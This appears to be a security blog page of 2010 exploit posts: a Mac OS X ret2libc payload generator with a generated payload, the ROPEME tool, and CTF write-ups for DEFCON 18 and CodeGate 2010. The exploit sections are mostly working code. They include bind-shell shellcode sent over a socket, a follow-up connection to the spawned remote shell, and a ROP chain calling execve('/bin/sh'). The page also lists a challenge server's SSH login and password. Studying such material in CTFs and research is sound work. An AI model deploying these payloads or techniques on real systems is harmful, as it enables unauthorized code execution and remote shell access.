Simple Mac OS X ret2libc exploit (x86)
October 5, 2010 by longld
When it comes to buffer overflow exploitation on x86, Mac OS X is the easiest and most hacker-friendly target compared to Linux or Windows. OS X always loads /usr/lib/dyld at a fixed location, and dyld contains a lot of helper stubs that can be used to launch the exploit. If you want something more advanced, like a ROP (Return-Oriented Programming) exploit, have a look at “Mac OS X Return-Oriented Exploitation” and the thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study”. But we don’t actually need ROP for 32-bit exploitation on OS X: a simple ret2libc is enough and straightforward to implement. Let's take a look at a multi-stage ret2libc exploit on OS X.
The target
Under OS X, dyld is always loaded at a fixed location, and its __IMPORT page is RWX, as shown below:
__TEXT 8fe00000-8fe0b000 [ 44K] r-x/rwx SM=COW /usr/lib/dyld
__TEXT 8fe0b000-8fe0c000 [ 4K] r-x/rwx SM=PRV /usr/lib/dyld
__TEXT 8fe0c000-8fe42000 [ 216K] r-x/rwx SM=COW /usr/lib/dyld
__LINKEDIT 8fe70000-8fe84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld
__DATA 8fe42000-8fe44000 [ 8K] rw-/rwx SM=PRV /usr/lib/dyld
__DATA 8fe44000-8fe6f000 [ 172K] rw-/rwx SM=COW /usr/lib/dyld
__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
Our goal is to transfer the desired shellcode to the __IMPORT section of dyld and then execute it. We could simply do this with the byte-by-byte copy method of ROPEME, but that method has some disadvantages:
- Payload size is large, around 10 times the size of the actual shellcode
- We have to regenerate the whole payload when switching to a new shellcode
On OS X we can do better, because there is an RWX page at a static location.
Staging payload
The most complicated part of the ROP technique is “stack pivoting”, that is, controlling the ESP register under ASLR. By executing a small shellcode we can easily take control of ESP. Our multi-stage payload looks like this:
Stage-2: actual shellcode
This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g. the bind shell code from Metasploit.
Stage-1: shellcode loader for stage-2 payload
This stage transfers the stage-2 payload from the stack to the __IMPORT section (RWX) of dyld and then executes it. The transfer function is _strcpy() in dyld. The small shellcode below is executed on the RWX page to do the job:
# 58 pop eax # eax -> TARGET
# 5B pop ebx # ebx -> STRCPY
# 54 push esp # src -> &shellcode
# 50 push eax # dst -> TARGET
# 50 push eax # jump to TARGET when return from _strcpy()
# 53 push ebx # STRCPY
# C3 ret # execute _strcpy(TARGET, &shellcode)
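To see why these seven bytes end up calling _strcpy(TARGET, &shellcode), the stack effect can be traced with a toy model. This is only a sketch: ESP0 is a made-up stack address, and the model tracks nothing but 32-bit pushes and pops.

```python
# Toy model of the x86 stack while stage-1 runs (not a real emulator).
TARGET = 0x8fe6f010   # RWX address used in the article
STRCPY = 0x8fe2db10   # _strcpy() in dyld, from the article
ESP0 = 0xbffff000     # hypothetical stack address, for illustration only

# Stack when execution reaches stage-1: [TARGET][STRCPY][stage-2 bytes ...]
mem = {ESP0: TARGET, ESP0 + 4: STRCPY}
esp = ESP0

def pop():
    global esp
    value = mem[esp]
    esp += 4
    return value

def push(value):
    global esp
    esp -= 4
    mem[esp] = value

eax = pop()    # 58 pop eax  -> TARGET
ebx = pop()    # 5B pop ebx  -> STRCPY
push(esp)      # 54 push esp -> src (esp points at the stage-2 bytes)
push(eax)      # 50 push eax -> dst
push(eax)      # 50 push eax -> return address used by _strcpy()
push(ebx)      # 53 push ebx -> address of _strcpy()
eip = pop()    # C3 ret      -> jump to _strcpy()

# cdecl view on entry: [esp] = return address, [esp+4] = dst, [esp+8] = src
ret_addr, dst, src = mem[esp], mem[esp + 4], mem[esp + 8]
print(hex(eip), hex(ret_addr), hex(dst), hex(src))
```

In this model src is ESP0 + 8, the first byte after the two popped words, which is where the stage-2 shellcode is appended.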
Stage-0: ret2libc loader for stage-1 payload
This stage transfers the 7 bytes of the stage-1 payload to our RWX location using repeated _strcpy() calls, then executes it. We search dyld for the necessary byte values and copy them to the target byte by byte.
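The article does not show gen_stage0(), so the following is only a sketch of how such a generator might work, not the author's code. The names gen_stage0_sketch, find_source and null_free are hypothetical, and the greedy "longest prefix first" search is an assumption. Because _strcpy() keeps copying until the next NUL byte, a copy may spill past the wanted bytes; later copies overwrite the spill.

```python
import struct

def null_free(addr):
    """True if the little-endian encoding of addr contains no NUL byte."""
    return b"\x00" not in struct.pack("<I", addr)

def find_source(blob, base, needle):
    """Address of the first occurrence of needle whose address is NUL-free."""
    pos = blob.find(needle)
    while pos != -1:
        if null_free(base + pos):
            return base + pos
        pos = blob.find(needle, pos + 1)
    return None

def gen_stage0_sketch(blob, base, stage1, strcpy_addr, pop2ret_addr, target):
    chain = b""
    offset = 0
    while offset < len(stage1):
        if not null_free(target + offset):
            raise ValueError("destination address contains a NUL byte")
        # Greedy: take the longest prefix of the remaining bytes found in blob.
        for n in range(len(stage1) - offset, 0, -1):
            src = find_source(blob, base, stage1[offset:offset + n])
            if src is not None:
                break
        else:
            raise ValueError("byte 0x%02x not found" % stage1[offset])
        # One ret2libc frame: _strcpy(dst, src); pop-pop-ret then skips both args.
        chain += struct.pack("<4I", strcpy_addr, pop2ret_addr, target + offset, src)
        offset += n
    # Return into stage-1, which pops TARGET and STRCPY into eax and ebx.
    chain += struct.pack("<3I", target, target, strcpy_addr)
    return chain

# Toy stand-in for the dyld code, only to exercise the function.
toy_blob = b"\x90" * 0x20 + b"\x58\x5b\x00\x54\x50\x50\x00\x53\xc3\x00"
chain = gen_stage0_sketch(toy_blob, 0x8fe01000, b"\x58\x5b\x54\x50\x50\x53\xc3",
                          0x8fe2db10, 0x8fe2878f, 0x8fe6f010)
print(len(chain), chain.hex())
```

Each frame costs 16 bytes, so the overhead depends on how many separate copies are needed to assemble the 7 bytes.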
In summary, our multi-stage payload has several advantages:
- Straightforward to implement: only ret2libc calls, no gadgets required
- Payload size overhead is small: around 100 bytes
- Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make a new payload
Automated payload generator
Let's put all this together and build an automated payload generator in Python.
- Select the target
#__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
TARGET = 0x8fe6f010 # to avoid NULL byte
# dyld base address
DYLDADDR = 0x8fe00000
- Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld
# ...
#architecture 1
# cputype 7
# cpusubtype 3
# capabilities 0x0
# offset 352256
# size 368080
# align 2^12 (4096)
# ...
DYLDFILE = "/usr/lib/dyld"
DYLDCODE = open(DYLDFILE, "rb").read()
DYLDCODE = DYLDCODE[352256 : 352256+368080]
- _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy
# 8fe2db10 t _strcpy
STRCPY = 0x8fe2db10
# $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop
# 8fe28790 popl %edi
# 8fe2b3d4 popl %edi
POP2RET = 0x8fe2878f
- stage-1
# stage1
# 58 pop eax # eax -> TARGET
# 5B pop ebx # ebx -> STRCPY
# 54 push esp # src -> &shellcode
# 50 push eax # dst -> TARGET
# 50 push eax # jump to TARGET when return from _strcpy()
# 53 push ebx # STRCPY
# C3 ret # execute _strcpy(TARGET, &shellcode)
STAGE1 = "\x58\x5b\x54\x50\x50\x53\xc3"
- stage-0
# stage0: _strcpy sequences
STAGE0 = gen_stage0(DYLDCODE, STAGE1)
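The offset and size hard-coded in the "Extract dyld's i386 code" step were read off the otool -f output by hand. As a sketch of an alternative, the same two numbers can be read from the fat header directly. The helper name find_fat_slice is hypothetical; the header layout (big-endian magic 0xcafebabe, an architecture count, then 20-byte records of cputype, cpusubtype, offset, size, align) is the standard universal binary format.

```python
import struct

FAT_MAGIC = 0xcafebabe   # big-endian magic of a universal (fat) Mach-O file
CPU_TYPE_I386 = 7        # matches "cputype 7" in the otool output

def find_fat_slice(data, cputype=CPU_TYPE_I386):
    """Return (offset, size) of the first slice with the given cputype."""
    magic, nfat_arch = struct.unpack_from(">II", data, 0)
    if magic != FAT_MAGIC:
        raise ValueError("not a fat binary")
    for i in range(nfat_arch):
        cpu, _subtype, offset, size, _align = struct.unpack_from(
            ">iiIII", data, 8 + 20 * i)
        if cpu == cputype:
            return offset, size
    raise ValueError("architecture not found")

# Synthetic two-entry header mirroring the numbers quoted in the article.
header = struct.pack(">II", FAT_MAGIC, 2)
header += struct.pack(">iiIII", 0x01000007, 3, 4096, 100, 12)   # x86_64 entry (made-up numbers)
header += struct.pack(">iiIII", 7, 3, 352256, 368080, 12)        # i386 entry
offset, size = find_fat_slice(header)
print(offset, size)
```

With a real file, `data[offset:offset + size]` would replace the hard-coded slice.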
Below is the stage-0 payload loader generated for OS X 10.6.4:
STAGE0 = ( "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f"
"\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" )
Test the payload with a simple buffer overflow:
bash-3.2$ ./vuln "`python -c 'print "A"*272 + "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" + "\xcc"*4'`"
...
Trace/BPT trap
bash-3.2$
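To make the structure of the generated STAGE0 visible, the bytes listed above can be split into little-endian 32-bit words. This is just a decoding aid written in Python 3; the grouping into four-word frames is inferred from the repeating pattern in the listing.

```python
import struct

STAGE0 = bytes.fromhex(
    "10dbe28f 8f87e28f 10f0e68f 3124e18f "
    "10dbe28f 8f87e28f 12f0e68f 3201e08f "
    "10dbe28f 8f87e28f 13f0e68f 7e21e18f "
    "10dbe28f 8f87e28f 15f0e68f 4510e08f "
    "10dbe28f 8f87e28f 16f0e68f 4410e08f "
    "10f0e68f 10f0e68f 10dbe28f"
)

words = struct.unpack("<%dI" % (len(STAGE0) // 4), STAGE0)
frames = [words[i:i + 4] for i in range(0, len(words) - 3, 4)]
tail = words[-3:]

for func, ret, dst, src in frames:
    # func = _strcpy, ret = pop-pop-ret, then the two _strcpy() arguments
    print("strcpy=%08x ret=%08x dst=%08x src=%08x" % (func, ret, dst, src))
print("tail: " + " ".join("%08x" % w for w in tail))
```

The destinations step through TARGET+0, +2, +3, +5 and +6, and the three tail words are TARGET, TARGET and STRCPY: the return into stage-1 followed by the two values it pops.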
Looking for what's next? Maybe “Mac OS X ROP exploit on x86_64” someday.
ROPEME – ROP Exploit Made Easy
ROPEME (ROP Exploit Made Easy) is a PoC tool for ROP exploit automation on Linux x86. It contains a set of simple Python scripts to generate and search for ROP gadgets in binaries and libraries (e.g. libc). A sample payload class is also included to help generate a multistage ROP payload with the technique described in the Black Hat USA 2010 talk “Payload already inside: data re-use for ROP exploits”.
Check the latest paper and slides and PoC code.
Enjoy ROPing!
DEFCON 18 Quals: Pwtent Pwnables 500 esd2 exploit
May 28, 2010 by longld
CLGT did not solve this during the quals! Here is the exploit for the esd2 binary leaked from pp200 (thanks beist for sharing). More analysis and a write-up for the real pp500 will come later:
#!/usr/bin/env python
import socket
import struct
import telnetlib
import time
HOST = '192.168.56.101'
PORT = 8302
def xor_input(data):
    static = "%5d | %5d\n" + "\x00"*4
    out = ""
    for i in range(len(data)):
        out += chr(ord(static[i]) ^ ord(data[i]))
    return out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# send password
s.send("sp3wn0w" + "\n")
# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
ret = 0x0804a0ce
# value to write into target
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
padding = "A"*128
fmt_string = "%" + str(write_byte) + "u%24$hn"
fmt_string = xor_input(fmt_string)
# bindshell: port 5678
shellcode = "\x00\x29\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63\x7d\xa9\x09\x83\xeb\xfc\xe2\xf4\x09\x1c\xf1\x90\x31\x15\xb9\x0b\x75\x53\x20\xe8\x31\x3f\xfb\x4b\x31\x17\xb9\xc4\xe3\xe4\x3a\x58\x30\x2f\xc3\x61\x3b\xb0\x29\xb9\x09\xb0\x29\x5b\x30\x2f\x19\x17\xae\xfd\x3e\x63\x61\x24\xc3\x53\x3b\x2c\xfe\x58\xae\xfd\xe0\x70\x96\x2d\xc1\x26\x4c\x0e\xc1\x61\x4c\x1f\xc0\x67\xea\x9e\xf9\x5d\x30\x2e\x19\x32\xae\xfd\xa9\x09"
payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "\n"
print "Sending payload...", repr(payload)
s.send("c\n" + str(len(payload)) +"\n")
s.send(payload)
# trigger the read_blob that calls lseek()
s.send("r\n" + "10\n")
print "Connecting to remote shell port 5678..."
time.sleep(4)
t = telnetlib.Telnet(HOST, 5678)
t.write("id\n\n")
t.interact()
t.close()
s.close()
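The address arithmetic in the comments of the exploit above can be checked with a few lines of Python 3. This is a sketch only: BUF_ADDR is taken from the "0x0804a040 + 142 bytes" comment, and the extra byte counted after the format string is the leading "\x00" of the shellcode string. The XOR with the static string presumably cancels a transformation applied by the service, which the post does not describe.

```python
BUF_ADDR = 0x0804a040   # buffer start, from the comment in the exploit
RET = 0x0804a0ce        # shellcode address the exploit writes
STATIC = b"%5d | %5d\n" + b"\x00" * 4

def xor_input(data):
    """Python 3 version of the exploit's xor_input(), working on bytes."""
    return bytes(s ^ d for s, d in zip(STATIC, data))

# %hn writes 16 bits, so only the low half of the address goes in the width.
write_half = RET & 0xffff
fmt = b"%" + str(write_half).encode() + b"u%24$hn"

# 128 bytes of target address plus padding, the format string, one NUL byte.
shellcode_addr = BUF_ADDR + 128 + len(fmt) + 1

print(fmt, hex(shellcode_addr))
```

The original value at the target, 0x08048ae2, already has 0x0804 as its upper half, which is why overwriting two bytes is enough.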
Return-oriented-programming practice: exploiting CodeGate 2010 Challenge 5
April 18, 2010 by longld
In my previous post about the CodeGate 2010 Challenge 5 exploit, I mentioned the weakness of needing access to the server to get the execl() address. In this post I will show how to blindly exploit the “harder” program without access to the remote server, using the return-oriented programming technique.
ROP introduction
A worthwhile introduction to ROP can be found on the Zynamics blog: http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/
In summary: we use return-into-instruction sequences (called gadgets) to build and execute our payload once we control EIP and ESP in the vulnerable program.
ROP limitations (difficulties):
- ASLR: as with return-into-libc, it’s difficult to locate the addresses of instructions in a library (e.g. libc)
- ASCII-armor addresses: with ASCII-armor remapping of libraries (e.g. libc), addresses contain a NULL byte, so chaining return-into-libc calls and ROP gadgets is impossible if the input is filtered for NULL bytes
The “harder” case
Fortunately, we can blindly exploit the “harder” program using ROP because its code offers some “advantages”:
- getline(): lets us pass NULL bytes in the input
- printf(): lets us leak runtime memory info (bypassing ASLR)
Finding ROP gadgets
Our goal is to invoke the execve("/bin/sh", 0, 0) syscall, which amounts to preparing the register values and then triggering the kernel syscall:
eax = 0xb // execve
ebx = address of “/bin/sh”
ecx = 0 // argv
edx = 0 // env
Searching the harder binary, we found the gadgets below:
- eax:
80483a4: 58 pop %eax
80483a5: 5b pop %ebx
80483a6: c9 leave
80483a7: c3 ret
- ebx & ecx:
8048634: 59 pop %ecx
8048635: 5b pop %ebx
8048636: c9 leave
8048637: c3 ret
“/bin/sh” is placed in the target buffer; its address is obtained by leaking it via printf()
- edx:
There’s no edx-related gadget, but observe that when memcpy() returns, edx has been set to the value of esi. So we can set esi to 0x0 first, then return to main again to zero edx.
0x001ba506 : mov edx,esi
80485e6: 5e pop %esi
80485e7: 5f pop %edi
80485e8: 5d pop %ebp
80485e9: c3 ret
- syscall:
In recent Linux kernels, a syscall is usually performed via the Linux gate: call gs:[0x10]. By returning to printf() in the harder program many times, we can find that the offset from getline() to the first syscall is 319 bytes.
- moving stack:
After “leave; ret”, our stack is moved to the new location pointed to by ebp. We can control this by setting ebp to somewhere in the middle of the target buffer.
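The interplay of the two "pop; pop; leave; ret" gadgets and the stack move is easier to follow when traced. The sketch below lays out the final payload the way the exploit code does and steps through it with a minimal model of pop, leave and ret. INPUT_ADDR and SYSCALL_ADDR are made-up values (the real ones are leaked at runtime), and edx is left out because it is zeroed beforehand via esi.

```python
import struct

# Hypothetical runtime values; the real exploit leaks them via printf().
INPUT_ADDR = 0xbffff100     # assumed address of the input buffer
SYSCALL_ADDR = 0xb7e4513f   # assumed address of "call gs:[0x10]"
POP_EAX = 0x080483a4        # pop eax; pop ebx; leave; ret
POP_ECX_EBX = 0x08048634    # pop ecx; pop ebx; leave; ret
GADGETS = {POP_EAX: ("eax", "ebx"), POP_ECX_EBX: ("ecx", "ebx")}

new_stack = INPUT_ADDR + 8
buf = b"/bin/sh\x00"
buf += struct.pack("<I", new_stack + 16)   # ebp loaded by the leave in pop_eax
buf += struct.pack("<I", POP_ECX_EBX)      # next gadget
buf += struct.pack("<I", 0)                # ecx
buf += struct.pack("<I", INPUT_ADDR)       # ebx -> "/bin/sh"
buf += b"AAAA"                             # ebp loaded by the last leave (unused)
buf += struct.pack("<I", SYSCALL_ADDR)
buf = buf.ljust(264, b"A")
buf += struct.pack("<I", new_stack)        # overwritten saved ebp
buf += struct.pack("<I", POP_EAX)          # overwritten return address
buf += struct.pack("<I", 0xb)              # eax = execve
buf += b"AAAA"                             # ebx (overwritten later)

regs = {"esp": 0, "ebp": INPUT_ADDR + 264, "eax": None, "ebx": None, "ecx": None}

def pop():
    value = struct.unpack_from("<I", buf, regs["esp"] - INPUT_ADDR)[0]
    regs["esp"] += 4
    return value

def leave():
    regs["esp"] = regs["ebp"]   # mov esp, ebp
    regs["ebp"] = pop()         # pop ebp

leave()                         # epilogue of the vulnerable function
eip = pop()                     # its ret
while eip in GADGETS:
    for name in GADGETS[eip]:
        regs[name] = pop()
    leave()
    eip = pop()

print(hex(eip), hex(regs["eax"]), hex(regs["ebx"]), hex(regs["ecx"]))
```

In this model execution ends at SYSCALL_ADDR with eax = 0xb, ebx pointing at "/bin/sh" and ecx = 0.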
Exploit code
#!/usr/bin/env python
import socket
import sys
import struct
import telnetlib
#host = 'ctf4.codegate.org'
host = '127.0.0.1'
port = 9005
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((host, port))
buf=""
# bypass first read
buf = c.recv(1024)
# getline() address
buf = "A"*268 + struct.pack('i', 0x08048524) + struct.pack('i', 0x0804a008) + "\n"
c.send(buf)
buf = c.recv(1024)
addr = ""
getline_addr = int(buf[:4][::-1].encode('hex'), 16)
print "getline() is at:", hex(getline_addr)
# call gs:[0x10] address
offset = 319 # first offset is 319 bytes from getline()
syscall_addr = getline_addr + offset
# buffer address
buf = "%7$x" + "\x00"*260 + struct.pack('i', 0x08048521)*2 + "\n"
c.send(buf)
buf = c.recv(1024)
input_addr = int(buf[:8], 16)
print "Buffer address is at: ", hex(input_addr)
# gadgets address
pop_eax = 0x080483a4
pop_ecx_ebx = 0x08048634
pop_esi = 0x080485e6
# pop esi
buf = "A"*268 + struct.pack('i', pop_esi) + "\x00" * 12 + struct.pack('i', 0x08048524)*2 + "\n"
c.send(buf)
c.recv(1024)
# pop eax then move stack to new address
input_addr += 560 # lifting after 2 getline() calls
new_stack = input_addr+8
buf = "/bin/sh\x00" # /bin/sh
buf += struct.pack('i', new_stack+16) # next ebp after leave from pop_eax
buf += struct.pack('i', pop_ecx_ebx) # next is pop_ecx_ebx
buf += "\x00"*4 # ecx
buf += struct.pack('i', input_addr) # ebx -> /bin/sh
buf += "A"*4 # un-used ebp after leave from pop_ecx_ebx
buf += struct.pack('i', syscall_addr)
buf = buf.ljust(264, "A") # padding
buf += struct.pack('i', new_stack) # new ebp
buf += struct.pack('i', pop_eax)
buf += "\x0b\x00\x00\x00" # execve syscall
buf += "A"*4 # un-used ebx
buf += "\n"
print "Sending final payload ..."
c.send(buf)
c.send("id 2>&1" + "\n"*5)
t = telnetlib.Telnet()
t.sock = c
t.interact()
c.close()
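The exploit above is Python 2. For readers porting it, the leaked-address parsing `int(buf[:4][::-1].encode('hex'), 16)` has a direct Python 3 equivalent, sketched here with a hypothetical helper name. Note also that the signed 'i' format only works for values below 0x80000000; the unsigned '<I' format is the safer choice for addresses.

```python
import struct

def parse_leaked_pointer(reply):
    """Interpret the first four bytes of a reply as a little-endian pointer."""
    return struct.unpack("<I", reply[:4])[0]

# Made-up reply bytes, for illustration only.
reply = b"\x24\x85\x04\x08" + b"rest of the output"
addr = parse_leaked_pointer(reply)
print(hex(addr))

# Equivalent without struct:
same = int.from_bytes(reply[:4], "little")
```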
CodeGate 2010 Challenge 2 – Xbox pwned
March 19, 2010 by RD
Summary
This is the most interesting challenge in CodeGate 2010 IMHO. The binary is a VM which loads the ‘codefile’ and executes it. The VM codefile is protected against tampering by a TEA-based hash algorithm. By exploiting a weakness of the hash algorithm (similar to the Xbox hack) together with a bug inside the VM, we could change the execution flow of the VM code to get the secret key content.
Analysis
Challenge information
credentials: ssh hugh@ctf4.codegate.org -p 9474 password=takeitaway
Exploit /home/hugh/yboy to read secret.key
There are yboy, codefile and secret.key files in the home directory of hugh (you can download these files here if you want to try it by yourself)
-rw-r--r-- 1 codegate codegate 1136 2010-03-12 14:45 codefile
-r-------- 1 daryl daryl 140 2010-03-12 15:27 secret.key
-rwsr-xr-x 1 daryl root 22307 2010-03-12 16:07 yboy
a. Reverse Engineering yboy
yboy basically does the following:
- loads the VM code from the codefile into memory (code[])
- loads the content of secret.key into memory (data[])
- checks the integrity of the codefile using a TEA-based hash algorithm against a hard-coded hash value, and exits if the hash does not match
- parses/decodes the loaded VM code and executes it accordingly
The VM code inside codefile does the following:
- asks the user to input a password
- compares the input with the flag inside secret.key
- if correct, prints out the flag
- otherwise, prints out an access denied error and exits
b. Decompiler for codefile
Since yboy loads the VM code from codefile and executes it, I wrote a decompiler for it
#include <stdio.h>
#include <stdlib.h>
const char *decode[32] = {
    "halt", "push", "pop", "add", "sub", "or", "xor", "nor", "shl",
    "shr", "not", "nop", "branch", "jumpreg", "callreg", "load",
    "store", "halt", "inputchar", "outputchar", "set_imm", "reload",
    "rrandom", "nop", "nop", "nop", "nop", "nop", "nop", "nop", "nop",
    "nop",
};
unsigned long registers[64];
/* 32-bit instruction words; unsigned int keeps them 4 bytes wide on 64-bit hosts too */
unsigned int code[32768];
unsigned int PC;
int main(int argc, char **argv)
{
    unsigned int ins;
    unsigned char reg;
    unsigned char imm1, imm2;
    unsigned char opcode;
    unsigned int codesize;
    int set_imm = 1;
    FILE *f;
    f = fopen(argv[1], "r");
    codesize = fread(code, 1, sizeof(code), f);
    fclose(f);
    //check_code();
    PC = 0;
    while (PC < (codesize) / 4) {
        set_imm = 1;
        ins = code[PC];
        opcode = (ins >> 24); //& 0x1f;
        reg = (ins >> 16) & 0xFF;
        imm1 = (ins >> 8) & 0xFF;
        imm2 = (unsigned char) ins;
        // set_imm
        if (opcode == 20) {
            printf("%04x: \tr%d = %s %x, %x", PC, reg,
                   decode[opcode & 0x1f], imm1, imm2);
            if (imm2 && !imm1)
                printf("\t; %c", imm2);
            else if (imm1)
                printf("\t; %04x", imm2 + (imm1 << 8));
            printf("\n");
            PC++;
            continue;
        }
        reg = (ins >> 16) & 0xBF;
        imm1 = (ins >> 8) & 0xBF;
        imm2 = ins & 0xBF;
        printf("%04x: \tr%d = %s r%d, r%d", PC, reg,
               decode[opcode & 0x1f], imm1, imm2);
        if (opcode == 12) // comment for branch
            printf("\t; if (r%d) goto r%d\n", imm1, imm2);
        else
            printf("\n");
        PC++;
    }
    return 0;
}
Here is the output of the decompiler
rd@jps(~/working/ctf/codegate2010/2/)$ ./yboy-decompile codefile
0000: r1 = set_imm 0, 45 ; E
0001: r0 = outputchar r1, r0
0002: r1 = set_imm 0, 6e ; n
0003: r0 = outputchar r1, r0
0004: r1 = set_imm 0, 74 ; t
0005: r0 = outputchar r1, r0
0006: r1 = set_imm 0, 65 ; e
0007: r0 = outputchar r1, r0
0008: r1 = set_imm 0, 72 ; r
0009: r0 = outputchar r1, r0
000a: r1 = set_imm 0, 20 ;
000b: r0 = outputchar r1, r0
000c: r1 = set_imm 0, 70 ; p
000d: r0 = outputchar r1, r0
000e: r1 = set_imm 0, 61 ; a
000f: r0 = outputchar r1, r0
0010: r1 = set_imm 0, 73 ; s
0011: r0 = outputchar r1, r0
0012: r1 = set_imm 0, 73 ; s
0013: r0 = outputchar r1, r0
0014: r1 = set_imm 0, 77 ; w
0015: r0 = outputchar r1, r0
0016: r1 = set_imm 0, 6f ; o
0017: r0 = outputchar r1, r0
0018: r1 = set_imm 0, 72 ; r
0019: r0 = outputchar r1, r0
001a: r1 = set_imm 0, 64 ; d
001b: r0 = outputchar r1, r0
001c: r1 = set_imm 0, 3e ; >
001d: r0 = outputchar r1, r0
001e: r1 = set_imm 0, 3e ; >
001f: r0 = outputchar r1, r0
0020: r60 = set_imm 0, ff ;
0021: r61 = set_imm 0, 1 ;
0022: r4 = set_imm 5, 39 ; 0539
0023: r3 = inputchar r0, r0
0024: r50 = set_imm 0, a ;
0025: r0 = store r4, r3
0026: r0 = nop r0, r0
0027: r10 = sub r3, r50
0028: r10 = not r10, r0
0029: r11 = set_imm 0, 2f ; /
002a: r0 = branch r10, r11 ; if (r10) goto r11
002b: r4 = add r61, r4
002c: r10 = sub r60, r3
002d: r11 = set_imm 0, 23 ; #
002e: r0 = branch r10, r11 ; if (r10) goto r11
002f: r19 = set_imm 5, 39 ; 0539
0030: r20 = set_imm 0, 0
0031: r21 = set_imm 0, 23 ; #
0032: r21 = sub r21, r20
0033: r21 = not r21, r0
0034: r22 = set_imm 0, 5e ; ^
0035: r0 = branch r21, r22 ; if (r21) goto r22
0036: r21 = load r20, r0
0037: r25 = add r19, r20
0038: r0 = nop r0, r0
0039: r26 = load r25, r0
003a: r26 = sub r21, r26
003b: r22 = set_imm 0, 41 ; A
003c: r0 = branch r26, r22 ; if (r26) goto r22
003d: r23 = set_imm 0, 1 ;
003e: r20 = add r20, r23
003f: r22 = set_imm 0, 31 ; 1
0040: r0 = branch r22, r22 ; if (r22) goto r22
0041: r1 = set_imm 0, 41 ; A
0042: r0 = outputchar r1, r0
0043: r1 = set_imm 0, 63 ; c
0044: r0 = outputchar r1, r0
0045: r1 = set_imm 0, 63 ; c
0046: r0 = outputchar r1, r0
0047: r1 = set_imm 0, 65 ; e
0048: r0 = outputchar r1, r0
0049: r1 = set_imm 0, 73 ; s
004a: r0 = outputchar r1, r0
004b: r1 = set_imm 0, 73 ; s
004c: r0 = outputchar r1, r0
004d: r1 = set_imm 0, 20 ;
004e: r0 = outputchar r1, r0
004f: r1 = set_imm 0, 44 ; D
0050: r0 = outputchar r1, r0
0051: r1 = set_imm 0, 65 ; e
0052: r0 = outputchar r1, r0
0053: r1 = set_imm 0, 6e ; n
0054: r0 = outputchar r1, r0
0055: r1 = set_imm 0, 69 ; i
0056: r0 = outputchar r1, r0
0057: r1 = set_imm 0, 65 ; e
0058: r0 = outputchar r1, r0
0059: r1 = set_imm 0, 64 ; d
005a: r0 = outputchar r1, r0
005b: r1 = set_imm 0, a ;
005c: r0 = outputchar r1, r0
005d: r0 = halt r0, r0
005e: r1 = set_imm 0, 47 ; G
005f: r0 = outputchar r1, r0
0060: r1 = set_imm 0, 72 ; r
0061: r0 = outputchar r1, r0
0062: r1 = set_imm 0, 65 ; e
0063: r0 = outputchar r1, r0
0064: r1 = set_imm 0, 65 ; e
0065: r0 = outputchar r1, r0
0066: r1 = set_imm 0, 74 ; t
0067: r0 = outputchar r1, r0
0068: r1 = set_imm 0, 7a ; z
0069: r0 = outputchar r1, r0
006a: r1 = set_imm 0, 20 ;
006b: r0 = outputchar r1, r0
006c: r1 = set_imm 0, 68 ; h
006d: r0 = outputchar r1, r0
006e: r1 = set_imm 0, 61 ; a
006f: r0 = outputchar r1, r0
0070: r1 = set_imm 0, 63 ; c
0071: r0 = outputchar r1, r0
0072: r1 = set_imm 0, 6b ; k
0073: r0 = outputchar r1, r0
0074: r1 = set_imm 0, 65 ; e
0075: r0 = outputchar r1, r0
0076: r1 = set_imm 0, 72 ; r
0077: r0 = outputchar r1, r0
0078: r1 = set_imm 0, 73 ; s
0079: r0 = outputchar r1, r0
007a: r1 = set_imm 0, 2e ; .
007b: r0 = outputchar r1, r0
007c: r1 = set_imm 0, 20 ;
007d: r0 = outputchar r1, r0
007e: r1 = set_imm 0, 4b ; K
007f: r0 = outputchar r1, r0
0080: r1 = set_imm 0, 65 ; e
0081: r0 = outputchar r1, r0
0082: r1 = set_imm 0, 65 ; e
0083: r0 = outputchar r1, r0
0084: r1 = set_imm 0, 70 ; p
0085: r0 = outputchar r1, r0
0086: r1 = set_imm 0, 20 ;
0087: r0 = outputchar r1, r0
